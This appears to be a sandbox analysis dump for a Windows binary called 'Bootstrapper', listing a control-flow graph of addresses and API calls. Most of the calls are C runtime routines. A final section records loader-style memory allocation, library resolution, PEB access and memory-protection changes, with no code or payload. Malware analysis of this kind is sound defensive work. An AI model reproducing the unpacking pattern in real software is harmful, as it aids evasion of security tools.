9915->9918 9921 78c590 9918->9921 9924 78c550 9921->9924 9927 78c510 9924->9927 9930 78c5b0 9927->9930 9931 77d070 3 API calls 9930->9931 9932 78c524 9931->9932 9492 795070 9493 7950ae 9492->9493 9494 795197 FindFirstFileExW std::_Timevec::_Timevec 9493->9494 9497 79510c 9493->9497 9495 7951b8 9494->9495 9496 79533c FindNextFileW 9495->9496 9495->9497 9496->9495 9496->9497 9933 792370 9934 7923a3 9933->9934 9937 792180 9934->9937 9936 7923c9 9938 782280 std::_Mutex::_Lock EnterCriticalSection 9937->9938 9939 7921bd 9938->9939 9939->9936 9501 77f060 9504 77f085 __FrameHandler3::FrameUnwindToState 9501->9504 9502 77f1f5 _Smanip 9503 77f212 9502->9503 9508 77f525 9502->9508 9503->9508 9510 77f247 9503->9510 9504->9502 9505 77f0fe ___vcrt_getptd 9504->9505 9506 77f10e ___vcrt_getptd ___vcrt_getptd 9505->9506 9509 77f109 9505->9509 9511 77f12e 9506->9511 9507 77f566 ___vcrt_getptd 9507->9509 9508->9507 9561 77f580 9508->9561 9524 77f3c3 __FrameHandler3::isNoExcept ___DestructExceptionObject 9510->9524 9551 77e6f0 9510->9551 9513 77f176 ___vcrt_getptd 9511->9513 9513->9502 9516 77f181 ___vcrt_getptd ___vcrt_getptd 9513->9516 9515 77f523 9515->9507 9543 780250 9516->9543 9520 77f1ba ___DestructExceptionObject 9521 77f1af 9520->9521 9523 77f1cf std::bad_alloc::bad_alloc 9520->9523 9521->9502 9522 77f285 __FrameHandler3::HandlerMap::iterator::operator++ 9541 77f274 9522->9541 9523->9521 9524->9515 9525 77f471 ___vcrt_getptd ___vcrt_getptd 9524->9525 9526 77f48c 9524->9526 9525->9526 9529 780250 ___TypeMatch 9526->9529 9530 77f4a2 9529->9530 9530->9515 9532 77f4ac ___vcrt_getptd ___vcrt_getptd 9530->9532 9531 77f2fa Concurrency::details::HardwareAffinity::operator!= 9531->9541 9533 77f4d7 _UnwindNestedFrames 9532->9533 9534 77f4c8 _UnwindNestedFrames 9532->9534 9535 77f4e4 9533->9535 9534->9535 9558 7800a0 9535->9558 9537 77f4f5 9540 77f501 CallUnexpected ___vcrt_getptd ___vcrt_getptd 9537->9540 9539 77f2f2 __FrameHandler3::HandlerMap::iterator::operator++ 9539->9531 9540->9515 9541->9522 9541->9524 9541->9531 9541->9539 9542 77f379 CatchIt 9541->9542 9555 7803e0 _Smanip 9541->9555 9556 780400 _Smanip 9541->9556 9557 780360 ___TypeMatch 9541->9557 9542->9541 9545 78025c 9543->9545 9544 77f1a5 9544->9521 9547 780300 9544->9547 9545->9544 9573 780360 ___TypeMatch 9545->9573 9550 78030f 9547->9550 9548 780322 type_info::operator== 9549 780349 9548->9549 9548->9550 9549->9520 9550->9548 9550->9549 9553 77e71c 9551->9553 9552 77e798 _Smanip _Smanip 9554 77e7c8 9552->9554 9553->9552 9554->9541 9555->9541 9556->9541 9557->9541 9574 7800c0 9558->9574 9560 7800b6 9560->9537 9562 77f597 ___vcrt_getptd 9561->9562 9563 77f592 9561->9563 9564 77f5a2 ___vcrt_getptd 9562->9564 9565 77f5fb _Smanip 9562->9565 9563->9515 9585 780520 EncodePointer 9564->9585 9568 77f611 9565->9568 9567 77f5b0 9567->9563 9567->9565 9568->9563 9569 77e6f0 2 API calls 9568->9569 9571 77f649 __FrameHandler3::HandlerMap::getLastEntry 9569->9571 9570 77f65a __FrameHandler3::HandlerMap::iterator::operator++ 9570->9571 9571->9563 9571->9570 9572 77f6e1 CatchIt 9571->9572 9572->9570 9573->9545 9580 7805c0 9574->9580 9578 780129 __CallSettingFrame@12 __FrameHandler3::FrameUnwindToState 9582 7801dc ___vcrt_getptd 9578->9582 9579 7801da __FrameHandler3::FrameUnwindToState 9579->9560 9581 780104 ___vcrt_getptd 9580->9581 9581->9578 9583 7801ff 9582->9583 9584 7801e7 ___vcrt_getptd 9582->9584 9583->9579 9584->9583 9585->9567 9940 77c560 InitializeSListHead 9941 77c360 9943 77c36e 9941->9943 9942 77c376 9943->9942 9945 77d010 ___vcrt_uninitialize_ptd ___vcrt_uninitialize_locks 9943->9945 9945->9942 9586 781060 9587 785190 ___free_lconv_num 3 API calls 9586->9587 9588 781074 9587->9588 9589 782260 9592 782460 9589->9592 9591 782271 9593 78246e 9592->9593 9595 782475 9593->9595 9596 7824a0 FreeLibrary 9593->9596 9595->9591 9597 7824b4 9596->9597 9597->9595 9598 7a9060 IsProcessorFeaturePresent 9599 783650 9604 784630 9599->9604 9601 78365c 9602 783673 9601->9602 9603 783664 ___setfflag 9601->9603 9603->9602 9605 784676 9604->9605 9607 7846dc 9605->9607 9608 797620 EnterCriticalSection 9605->9608 9607->9601 9608->9607 9609 785650 GetSystemInfo 9610 7856b8 9609->9610 9611 79b450 9614 785050 9611->9614 9613 79b468 9615 785088 9614->9615 9617 7850d0 __nh_malloc 9615->9617 9618 797620 EnterCriticalSection 9615->9618 9617->9613 9618->9617 9622 77e040 9623 77e04b 9622->9623 9624 77e076 TlsSetValue 9623->9624 9625 77e054 9623->9625 9624->9625 9383 783740 9386 79a0a0 9383->9386 9387 79a0b7 9386->9387 9388 783754 9386->9388 9387->9388 9392 792bf0 9387->9392 9395 799e40 VirtualProtect 9387->9395 9397 7982e0 9387->9397 9406 799f30 9392->9406 9394 792bfa 9394->9387 9396 799e62 9395->9396 9396->9387 9424 797620 EnterCriticalSection 9397->9424 9399 798319 9425 797b90 9399->9425 9401 79832e 9403 798335 9401->9403 9431 798060 GetStartupInfoW 9401->9431 9403->9387 9409 799570 9406->9409 9412 7996e0 9409->9412 9413 799715 9412->9413 9414 79958b 9413->9414 9416 799760 9413->9416 9414->9394 9417 799779 9416->9417 9423 797620 EnterCriticalSection 9417->9423 9419 799786 VirtualProtect 9422 7997a8 9419->9422 9420 799855 VirtualProtect 9421 799874 9420->9421 9421->9414 9422->9420 9423->9419 9424->9399 9426 797bcb 9425->9426 9428 797c10 9426->9428 9443 797620 EnterCriticalSection 9426->9443 9428->9401 9430 797c4e 9430->9428 9444 7979d0 9430->9444 9432 798080 9431->9432 9433 79807a 9431->9433 9437 798190 9432->9437 9433->9432 9434 797b90 2 API calls 9433->9434 9435 7980c6 9434->9435 9435->9432 9436 798147 GetFileType 9435->9436 9436->9435 9439 7981a1 9437->9439 9438 798244 9438->9403 9439->9438 9440 798204 GetStdHandle 9439->9440 9441 798217 9440->9441 9441->9438 9442 798235 GetFileType 9441->9442 9442->9438 9443->9430 9445 784fd0 9444->9445 9446 7979ea std::_Timevec::_Timevec 9445->9446 9447 7979fe 9446->9447 9447->9430 9626 792640 std::_Timevec::_Timevec 9631 792450 9626->9631 9632 792483 9631->9632 9639 792100 9632->9639 9634 7924a9 std::_Fac_node::_Fac_node 9635 792300 9634->9635 9636 792333 9635->9636 9646 792200 9636->9646 9638 792359 9642 782280 9639->9642 9641 79213d 9641->9634 9645 797620 EnterCriticalSection 9642->9645 9644 782294 9644->9641 9645->9644 9647 782280 std::_Mutex::_Lock EnterCriticalSection 9646->9647 9648 79223d 9647->9648 9648->9638 9949 79b140 __abstract_cw 9950 79b19e 9949->9950 9951 79b177 __hw_cw 9949->9951 9952 79b180 __abstract_cw 9951->9952 9952->9950 9649 7ab640 __get_fname 9650 7ab65d __ctrlfp __umatherr 9649->9650 9651 780030 9652 780092 9651->9652 9653 780047 9651->9653 9653->9652 9654 78007d ___vcrt_getptd 9653->9654 9654->9652 9655 79c030 9656 79c05c 9655->9656 9657 79c110 9656->9657 9659 79c150 9656->9659 9660 79c15e __aligned_msize 9659->9660 9661 79c2f4 __invoke_watson_if_error 9660->9661 9662 79c1bd __strftime_l 9660->9662 9661->9662 9662->9657 9663 795430 __wcstombs_l 9958 77c120 9960 77c138 9958->9960 9962 77c131 9958->9962 9959 77c14b ___scrt_is_ucrt_dll_in_use 9959->9962 9960->9959 9963 77c670 IsProcessorFeaturePresent 9960->9963 9964 77c685 __aligned_msize 9963->9964 9965 77c734 IsDebuggerPresent 9964->9965 9966 77c756 SetUnhandledExceptionFilter UnhandledExceptionFilter 9965->9966 9968 77c790 9966->9968 9968->9959 9667 737010 9668 7370f3 9667->9668 9669 7385a0 GetProcessHeap GetStdHandle GetCurrentThread 9668->9669 9670 73815b 9668->9670 9671 77c410 9674 77c3a0 9671->9674 9675 77c3b4 9674->9675 9676 77c3da 9674->9676 9680 7833a0 9675->9680 9683 783460 std::_Fac_node::_Fac_node 9676->9683 9679 77c3bd 9681 783460 _atexit std::_Fac_node::_Fac_node 9680->9681 9682 7833b3 9681->9682 9682->9679 9684 783480 _atexit 9683->9684 9684->9679 9969 77d310 ___vcrt_getptd 9970 77d321 9969->9970 9971 78d110 9973 78d135 9971->9973 9974 78d13c __strftime_l 9973->9974 9975 78e650 9973->9975 9976 78e686 9975->9976 9981 78e69f 9975->9981 9977 78e6c1 9976->9977 9978 78e697 9976->9978 9976->9981 9985 78f140 9977->9985 9982 78f430 9978->9982 9981->9973 9989 78f580 9982->9989 9984 78f443 9984->9981 9986 78f155 9985->9986 9988 78f164 _strlen 9986->9988 10000 789480 9986->10000 9988->9981 9991 78f5a4 9989->9991 9990 78f5ab 9990->9984 9991->9990 9993 79d2e0 9991->9993 9994 79d2ee 9993->9994 9998 79d2f4 __strftime_l 9993->9998 9995 79d50c 9994->9995 9997 79d40c 9994->9997 9994->9998 9996 7971a0 MultiByteToWideChar 9995->9996 9996->9998 9997->9998 9999 7971a0 MultiByteToWideChar 9997->9999 9998->9990 9999->9998 10001 78949b __strftime_l 10000->10001 10002 7894b7 __wcstombs_l 10000->10002 10001->9988 10002->10001 10003 789526 10002->10003 10004 789537 10002->10004 10005 77d070 3 API calls 10003->10005 10006 78c600 3 API calls 10004->10006 10005->10001 10007 789549 10006->10007 10008 77d070 3 API calls 10007->10008 10008->10001 9685 79a010 GetProcessHeap 9686 79a029 9685->9686 9687 796210 9694 7870e0 9687->9694 9689 79622b 9690 79623b GetOEMCP 9689->9690 9691 79625d 9689->9691 9693 796256 9690->9693 9692 796263 GetACP 9691->9692 9691->9693 9692->9693 9695 78710c 9694->9695 9697 7870f6 9694->9697 9695->9697 9698 79b640 9695->9698 9697->9689 9700 79b64f 9698->9700 9699 79b670 9699->9697 9700->9699 9702 799310 9700->9702 9703 79934e 9702->9703 9705 799374 9703->9705 9706 797620 EnterCriticalSection 9703->9706 9705->9699 9706->9705 10012 791310 10013 79131f 10012->10013 10014 791339 GetModuleHandleExW 10013->10014 10015 79132f 10013->10015 10016 79135a __aligned_msize 10014->10016 10017 7913ef __invoke_watson_if_error 10016->10017 10018 7913fb __aligned_msize 10016->10018 10017->10018 10019 79178b __aligned_msize 10018->10019 10021 79177f __invoke_watson_if_error 10018->10021 10019->10015 10020 7917d3 10019->10020 10027 79a600 10020->10027 10021->10019 10024 7917f1 GetCurrentProcess TerminateProcess 10024->10015 10026 7917ee 10026->10024 10034 79a480 10027->10034 10030 79a670 10032 79a6d4 10030->10032 10033 79a707 10032->10033 10041 797620 EnterCriticalSection 10032->10041 10033->10026 10035 79a4b3 10034->10035 10038 79a3f0 10035->10038 10037 7917d8 10037->10024 10037->10030 10039 782280 std::_Mutex::_Lock EnterCriticalSection 10038->10039 10040 79a434 10039->10040 10040->10037 10041->10033 9710 721000 9711 7210c5 9710->9711 9712 7215de GetCurrentThreadId GetStdHandle GetProcessHeap 9711->9712 9713 721376 9711->9713 9712->9713 9714 7217e3 9713->9714 9715 722d5e GetLastError GetProcessHeap GetCurrentProcessId GetProcessHeap GetStdHandle 9713->9715 9716 72551e GetStdHandle GetCurrentThreadId GetModuleHandleW GetCurrentThreadId 9714->9716 9717 72511c 9714->9717 9715->9714 9718 77e000 9719 77e00b 9718->9719 9720 77e032 TlsGetValue 9719->9720 9721 77e014 9719->9721 9720->9721 9722 77c200 9723 77c250 is_potentially_valid_image_base 9722->9723 9724 77c26d find_pe_section 9723->9724 9725 77c25a 9723->9725 9724->9725 9726 784400 9729 797620 EnterCriticalSection 9726->9729 9728 784439 9729->9728 9730 79e000 9731 79e00b 9730->9731 9739 7a4000 9731->9739 9733 79e010 9734 79e055 9733->9734 9746 7a4150 9733->9746 9736 785190 ___free_lconv_num 3 API calls 9734->9736 9738 79e063 9736->9738 9737 79e03a DeleteCriticalSection 9737->9733 9752 797620 EnterCriticalSection 9739->9752 9741 7a4102 9741->9733 9742 7a407b std::_Timevec::_Timevec 9743 7a4040 9742->9743 9743->9741 9743->9742 9744 7a40c0 DeleteCriticalSection 9743->9744 9745 785190 ___free_lconv_num 3 API calls 9744->9745 9745->9743 9747 7a417f std::_Timevec::_Timevec 9746->9747 9748 7a415c 9746->9748 9749 7a4193 9747->9749 9748->9747 9750 785190 ___free_lconv_num 3 API calls 9749->9750 9751 7a419a 9749->9751 9750->9751 9751->9737 9752->9743 9753 7a4200 9754 7a4215 __aligned_msize 9753->9754 9756 7a426f __strftime_l __aligned_msize 9754->9756 9757 7a45b0 9754->9757 9758 7a45e4 9757->9758 9759 7a46d8 9758->9759 9760 7a4897 9758->9760 9767 7a45ea __strftime_l _strlen 9758->9767 9759->9767 9768 7971a0 9759->9768 9762 7971a0 MultiByteToWideChar 9760->9762 9760->9767 9762->9767 9763 7a475a 9764 7a4771 GetLastError 9763->9764 9763->9767 9766 7a47a1 9764->9766 9764->9767 9765 7971a0 MultiByteToWideChar 9765->9767 9766->9765 9766->9767 9767->9756 9771 7970a0 9768->9771 9772 7970b5 MultiByteToWideChar 9771->9772 9772->9763 9773 7836f0 9774 783708 9773->9774 9775 783720 9773->9775 9774->9775 9776 785190 ___free_lconv_num 3 API calls 9774->9776 9776->9775 9777 7994f0 9778 7996e0 3 API calls 9777->9778 9779 79950b 9778->9779 9780 7972f0 9781 797301 9780->9781 9782 79737e WideCharToMultiByte 9781->9782 9783 7a56f0 std::_Mutex::_Lock 9784 7a5743 9783->9784 10049 7ac3f0 10050 7ac409 10049->10050 10054 7ac43a 10050->10054 10055 77d430 ___vcrt_getptd 10050->10055 10052 7ac430 10056 77d440 ___vcrt_getptd 10052->10056 10055->10052 10056->10054 9294 7bd8e8 9295 7bd908 9294->9295 9297 7bd980 9295->9297 9310 7be180 9297->9310 9299 7bda14 9299->9295 9300 7bd99a 9300->9299 9323 7be450 9300->9323 9306 7bd9e1 9340 7be890 9306->9340 9308 7bd9fb 9308->9299 9377 7bdfd0 9308->9377 9311 7be190 9310->9311 9322 7be232 9310->9322 9312 7bdfd0 LoadLibraryW 9311->9312 9311->9322 9313 7be1e6 9312->9313 9314 7be1ec NtAllocateVirtualMemory 9313->9314 9315 7be20d 9314->9315 9314->9322 9316 7be21f 9315->9316 9317 7be25e 9315->9317 9318 7bdfd0 LoadLibraryW 9316->9318 9319 7bdfd0 LoadLibraryW 9317->9319 9318->9322 9320 7be273 9319->9320 9321 7bdfd0 LoadLibraryW 9320->9321 9320->9322 9321->9322 9322->9300 9324 7bd9c7 9323->9324 9327 7be472 9323->9327 9328 7be590 9324->9328 9325 7be4a6 LoadLibraryA 9325->9327 9326 7bdfd0 LoadLibraryW 9326->9327 9327->9324 9327->9325 9327->9326 9329 7bd9d4 9328->9329 9330 7be5b2 9328->9330 9332 7be6c0 9329->9332 9330->9329 9331 7bdfd0 LoadLibraryW 9330->9331 9331->9330 9333 7bdfd0 LoadLibraryW 9332->9333 9334 7be6e8 9333->9334 9335 7be6ee NtProtectVirtualMemory 9334->9335 9337 7be71d 9335->9337 9336 7be80c 9336->9306 9337->9336 9338 7bdfd0 LoadLibraryW 9337->9338 9339 7be7ee NtProtectVirtualMemory 9337->9339 9338->9337 9339->9337 9341 7bdfd0 LoadLibraryW 9340->9341 9342 7be8a2 9341->9342 9343 7bdfd0 LoadLibraryW 9342->9343 9344 7be8b7 9343->9344 9345 7bdfd0 LoadLibraryW 9344->9345 9376 7bec4f 9344->9376 9346 7be8e9 9345->9346 9347 7bdfd0 LoadLibraryW 9346->9347 9348 7be8fe 9347->9348 9349 7bdfd0 LoadLibraryW 9348->9349 9350 7be926 9349->9350 9351 7bdfd0 LoadLibraryW 9350->9351 9350->9376 9352 7be957 9351->9352 9353 7bdfd0 LoadLibraryW 9352->9353 9354 7be976 9353->9354 9355 7bdfd0 LoadLibraryW 9354->9355 9356 7be99b 9355->9356 9357 7bdfd0 LoadLibraryW 9356->9357 9358 7be9d8 9357->9358 9359 7bdfd0 LoadLibraryW 9358->9359 9360 7be9fb 9359->9360 9361 7bdfd0 LoadLibraryW 9360->9361 9362 7bea1e 9361->9362 9363 7bdfd0 LoadLibraryW 9362->9363 9364 7bea40 9363->9364 9365 7bdfd0 LoadLibraryW 9364->9365 9366 7bea55 9365->9366 9367 7bdfd0 LoadLibraryW 9366->9367 9368 7bea79 9367->9368 9369 7bdfd0 LoadLibraryW 9368->9369 9370 7bea8e 9369->9370 9371 7bdfd0 LoadLibraryW 9370->9371 9372 7bebad 9371->9372 9373 7bdfd0 LoadLibraryW 9372->9373 9374 7bebc2 9373->9374 9375 7bebd8 GetPEB 9374->9375 9375->9376 9376->9308 9379 7be11c 9377->9379 9378 7be172 9378->9299 9379->9378 9380 7be164 LoadLibraryW 9379->9380 9380->9378 9785 77d6e0 RtlUnwind 10057 7825e0 GetModuleHandleW 10058 7825f9 10057->10058 10059 7923e0 10060 792413 10059->10060 10063 792280 10060->10063 10062 792439 10064 782280 std::_Mutex::_Lock EnterCriticalSection 10063->10064 10065 7922bd 10064->10065 10068 7925d0 10065->10068 10067 7922cc 10067->10062 10069 7925f0 10068->10069 10071 7925ee 10068->10071 10070 785190 ___free_lconv_num 3 API calls 10069->10070 10069->10071 10070->10071 10071->10067 10072 7983e0 10073 7983f0 10072->10073 10099 7983eb 10072->10099 10074 785190 ___free_lconv_num 3 API calls 10073->10074 10075 79840c 10073->10075 10074->10075 10076 79842b 10075->10076 10078 785190 ___free_lconv_num 3 API calls 10075->10078 10077 79844a 10076->10077 10079 785190 ___free_lconv_num 3 API calls 10076->10079 10080 798469 10077->10080 10081 785190 ___free_lconv_num 3 API calls 10077->10081 10078->10076 10079->10077 10082 798488 10080->10082 10083 785190 ___free_lconv_num 3 API calls 10080->10083 10081->10080 10084 7984a7 10082->10084 10086 785190 ___free_lconv_num 3 API calls 10082->10086 10083->10082 10085 7984c6 10084->10085 10087 785190 ___free_lconv_num 3 API calls 10084->10087 10088 7984e5 10085->10088 10089 785190 ___free_lconv_num 3 API calls 10085->10089 10086->10084 10087->10085 10090 798504 10088->10090 10091 785190 ___free_lconv_num 3 API calls 10088->10091 10089->10088 10092 798523 10090->10092 10094 785190 ___free_lconv_num 3 API calls 10090->10094 10091->10090 10093 798542 10092->10093 10095 785190 ___free_lconv_num 3 API calls 10092->10095 10096 798561 10093->10096 10097 785190 ___free_lconv_num 3 API calls 10093->10097 10094->10092 10095->10093 10098 785190 ___free_lconv_num 3 API calls 10096->10098 10096->10099 10097->10096 10098->10099 10100 7821d0 GetProcAddress 10101 7835d0 10102 785190 ___free_lconv_num 3 API calls 10101->10102 10103 7835e2 10102->10103 10104 785190 ___free_lconv_num 3 API calls 10103->10104 10105 7835fd 10104->10105 10106 785190 ___free_lconv_num 3 API calls 10105->10106 10107 783618 10106->10107 10108 785190 ___free_lconv_num 3 API calls 10107->10108 10109 783632 10108->10109 9786 79f4d0 9787 79f4e8 9786->9787 9788 79f4ea _strlen 9786->9788 9788->9787 9789 79f536 OutputDebugStringW 9788->9789 9789->9787 9790 7974c0 GetEnvironmentStringsW std::_Timevec::_Timevec 9791 7974df 9790->9791 9792 7974e6 9791->9792 9794 7974fd __wcstombs_l 9791->9794 9802 7973b0 9792->9802 9795 797536 std::_Timevec::_Timevec 9794->9795 9796 79754a 9795->9796 9797 797551 9796->9797 9799 79756d 9796->9799 9798 7973b0 FreeEnvironmentStringsW 9797->9798 9801 7974f5 9798->9801 9800 7973b0 FreeEnvironmentStringsW 9799->9800 9800->9801 9805 7973f0 9802->9805 9804 7973c1 9804->9801 9806 7973fe 9805->9806 9807 797405 9806->9807 9809 797430 FreeEnvironmentStringsW 9806->9809 9807->9804 9809->9807 10113 7975c0 10115 7975cf 10113->10115 10116 797600 10115->10116 10117 797640 10115->10117 10118 797650 10117->10118 10119 79765f DeleteCriticalSection 10118->10119 10120 797685 10118->10120 10119->10118 10120->10116 9810 7a64c0 9812 7a64d1 9810->9812 9811 7a64d8 9812->9811 9813 7a655d GetConsoleMode 9812->9813 9813->9811 9814 77c4b0 9815 77c4c0 9814->9815 9817 77c4cc 9815->9817 9818 77c440 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9815->9818 9818->9817 9819 7854b0 9820 7854be 9819->9820 9822 7854ef 9820->9822 9824 7854cd __aligned_msize 9820->9824 9825 785270 9820->9825 9829 785400 9822->9829 9827 7852a8 9825->9827 9826 7852f0 ___free_lconv_num 9826->9822 9827->9826 9832 797620 EnterCriticalSection 9827->9832 9833 797620 EnterCriticalSection 9829->9833 9831 785440 9831->9824 9832->9826 9833->9831 9834 79e0b0 std::_Timevec::_Timevec 9835 781840 9834->9835 9836 79e0c9 LeaveCriticalSection 9835->9836 10124 7963b0 10125 7963d5 GetCPInfo 10124->10125 10126 796559 10124->10126 10125->10126 10127 7963f1 10125->10127 10131 7a00c0 10127->10131 10129 79651f 10130 7a00c0 EnterCriticalSection 10129->10130 10130->10126 10132 7870e0 EnterCriticalSection 10131->10132 10133 7a00d4 10132->10133 10133->10129 10134 79b3b0 10135 79b3ca 10134->10135 10136 79b3bc 10134->10136 10138 79b3d0 10135->10138 10142 79b3e0 10135->10142 10144 7a15b0 10136->10144 10141 79b350 ___free_lconv_num 2 API calls 10138->10141 10139 79b3f5 HeapReAlloc 10140 79b3c5 10139->10140 10139->10142 10141->10140 10142->10139 10142->10140 10149 79a1c0 10142->10149 10145 7a15cd 10144->10145 10147 7a15be 10144->10147 10146 7a15e8 HeapAlloc 10145->10146 10145->10147 10148 79a1c0 EnterCriticalSection 10145->10148 10146->10145 10146->10147 10147->10140 10148->10145 10152 79a230 10149->10152 10151 79a1cd 10151->10142 10155 797620 EnterCriticalSection 10152->10155 10154 79a270 10154->10151 10155->10154 10156 7a63b0 10159 7a63de 10156->10159 10157 7a6499 10158 7a6423 GetLastError 10158->10157 10159->10157 10159->10158 10160 7a9020 GetLastError WriteConsoleW CreateFileW CloseHandle 10159->10160 10161 7a6460 GetLastError 10159->10161 10160->10159 10161->10157 10162 7255a0 10163 725693 10162->10163 10164 726407 10163->10164 10167 7280ef GetModuleHandleW GetStdHandle 10163->10167 10165 7282e2 10164->10165 10166 729314 GetCurrentThreadId GetCurrentProcess 10164->10166 10166->10165 10167->10164 10168 73c5a0 10170 73c71b 10168->10170 10171 73c6d6 10168->10171 10169 73cd29 GetStdHandle GetLastError GetModuleHandleW GetCurrentProcess 10173 73cc18 10169->10173 10170->10171 10172 73cb0a GetCurrentThreadId GetProcessHeap GetProcessHeap GetCurrentProcess 10170->10172 10171->10169 10171->10173 10172->10171 9381 77bca0 ___scrt_get_show_window_mode 9382 77bcb6 9381->9382 10174 77d3a0 10175 77d3f7 ___vcrt_getptd 10174->10175 10176 77d3bf 10174->10176 10177 77d402 ___vcrt_getptd 10175->10177 10179 77d3d1 10175->10179 10176->10175 10178 77d3d3 ___vcrt_getptd ___vcrt_getptd 10176->10178 10176->10179 10177->10179 10180 783870 10178->10180 10180->10175 10181 78a1a0 10182 78a1b7 10181->10182 10183 789480 3 API calls 10182->10183 10184 78a328 __strftime_l 10182->10184 10183->10184 10185 7825a0 10186 7825ad GetCurrentProcess TerminateProcess 10185->10186 10187 7825be 10185->10187 10186->10187 10188 7825c7 ExitProcess 10187->10188 10189 7955a0 10194 7955b5 10189->10194 10190 7955db 10192 785190 ___free_lconv_num 3 API calls 10190->10192 10191 785190 ___free_lconv_num 3 API calls 10191->10194 10193 7955e8 10192->10193 10194->10190 10194->10191 10195 7d01a0 10199 7d01b4 10195->10199 10196 7d0361 10197 7d0a81 RtlExpandEnvironmentStrings 10197->10199 10198 7d0cf3 RtlExpandEnvironmentStrings 10198->10199 10199->10196 10199->10197 10199->10198 9837 77d290 9839 77d29e 9837->9839 9840 77d302 9837->9840 9838 77d2de ___vcrt_getptd ___vcrt_getptd 9838->9840 9839->9838 9839->9840 10200 783590 10203 77d010 ___vcrt_uninitialize_ptd ___vcrt_uninitialize_locks 10200->10203 10202 78359c 10203->10202 10204 798590 10205 79859b 10204->10205 10206 7985a0 10204->10206 10207 7985ba 10206->10207 10208 785190 ___free_lconv_num 3 API calls 10206->10208 10209 7985d9 10207->10209 10211 785190 ___free_lconv_num 3 API calls 10207->10211 10208->10207 10210 7985f8 10209->10210 10212 785190 ___free_lconv_num 3 API calls 10209->10212 10213 798617 10210->10213 10214 785190 ___free_lconv_num 3 API calls 10210->10214 10211->10209 10212->10210 10213->10205 10215 785190 ___free_lconv_num 3 API calls 10213->10215 10214->10213 10215->10205 10219 79a390 10220 79a39c 10219->10220 10223 79a2d0 10220->10223 10222 79a3da 10226 797620 EnterCriticalSection 10223->10226 10225 79a310 10225->10222 10226->10225 9845 7a7490 9846 7a7499 9845->9846 9847 7a7450 9845->9847 9848 7a9ac0 __ctrlfp 9847->9848 9849 7a748e 9847->9849 9852 7a9b82 9848->9852 9855 7a9b06 9848->9855 9850 7a74f2 9849->9850 9857 7a9420 9849->9857 9851 7a9b32 __ctrlfp 9852->9851 9853 7a9be2 __except1 9852->9853 9853->9851 9855->9851 9856 7a9b4b __except1 9855->9856 9856->9851 9858 7a9431 DecodePointer 9857->9858 9859 7a9442 9857->9859 9858->9859 9859->9850 10227 7a9190 10230 7a91ae 10227->10230 10229 7a91a6 10231 7a91b3 10230->10231 10232 7a9248 10231->10232 10233 7a9420 DecodePointer 10231->10233 10232->10229 10234 7a93df 10233->10234 10234->10229 10235 7a6590 10238 7a659f 10235->10238 10236 7a66b7 WriteFile 10236->10238 10239 7a66f3 GetLastError 10236->10239 10237 7a6741 10238->10236 10238->10237 10239->10237 10240 7a1390 10241 7a13a2 10240->10241 10244 7a1050 std::_Timevec::_Timevec 10241->10244 10243 7a13af 10245 7a106a 10244->10245 10247 7a1071 10245->10247 10248 7a12b0 std::_Timevec::_Timevec 10245->10248 10247->10243 10249 7a12cd 10248->10249 10249->10247 9860 77c080 ___scrt_is_ucrt_dll_in_use 9861 77c08f ___scrt_acquire_startup_lock 9860->9861 10250 77c580 10251 77c594 10250->10251 10252 77c5a2 10251->10252 10253 77c670 __initialize_default_precision 4 API calls 10251->10253 10253->10252 9862 781080 9863 7810b4 9862->9863 9869 7810ad 9862->9869 9863->9869 9872 781350 GetModuleFileNameW 9863->9872 9865 781165 9866 7811f5 std::_Timevec::_Timevec 9865->9866 9867 781209 9866->9867 9868 7812ad std::_Timevec::_Timevec 9867->9868 9867->9869 9870 7812bf 9868->9870 9870->9869 9871 7812f0 std::_Timevec::_Timevec 9870->9871 9871->9869 9872->9865 9873 78b280 9874 78b297 9873->9874 9876 78b408 __strftime_l 9874->9876 9877 789570 9874->9877 9878 78958b __strftime_l 9877->9878 9879 7895a7 __wcstombs_l 9877->9879 9878->9876 9879->9878 9880 789618 9879->9880 9881 789629 9879->9881 9886 77d070 9880->9886 9889 78c600 9881->9889 9885 77d070 3 API calls 9885->9878 9892 77d0f0 9886->9892 9890 77d0f0 __crt_unique_heap_ptr 3 API calls 9889->9890 9891 78963b 9890->9891 9891->9885 9895 77d030 9892->9895 9896 785190 ___free_lconv_num 3 API calls 9895->9896 9897 77d042 9896->9897 9897->9878 9898 797080 GetCommandLineA GetCommandLineW 9899 79e080 std::_Timevec::_Timevec 9900 781840 9899->9900 9901 79e099 EnterCriticalSection 9900->9901 9902 79b480 9903 79b48e 9902->9903 9904 79b518 HeapSize 9903->9904 9907 79b4d3 9903->9907 9905 79b533 HeapReAlloc 9904->9905 9905->9907 9908 79b56d 9905->9908 9909 79b58d GetLastError 9908->9909 9912 79b5c0 9908->9912 9909->9907 9913 79b5d1 HeapQueryInformation 9912->9913 9914 79b57e 9912->9914 9913->9914 9914->9907 9914->9909 10256 799180 10257 799194 10256->10257 10258 79918b 10256->10258 10258->10257 10259 785190 ___free_lconv_num 3 API calls 10258->10259 10259->10257

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 007BDFD0: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 007BE16B
                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000002,00000000,00000000,00000000,082962C8,?,?,007BD9E1,?,00000000,?), ref: 007BE701
                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,?,007BD9E1,00000000,00000000,00000000,00000000,082962C8,?,?,007BD9E1,?,00000000,?), ref: 007BE803
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual$LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 4159661263-3916222277
